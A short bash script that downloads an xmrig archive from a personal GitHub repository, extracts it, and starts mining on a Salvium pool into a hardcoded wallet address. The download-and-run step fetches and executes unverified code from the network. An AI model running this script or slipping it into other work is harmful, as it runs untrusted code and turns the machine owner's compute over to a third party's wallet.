#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o sg.salvium.herominers.com:1230 -u SaLvs8sL7p35127hfBws5pafhQhnNHbtSGfpVjUPvyEiQCwtMdYj71ohfQGUfX9dULPLFzbWZNAafC9smLBaNfEbgDWCmsREJLj -p xxx -a rx/0
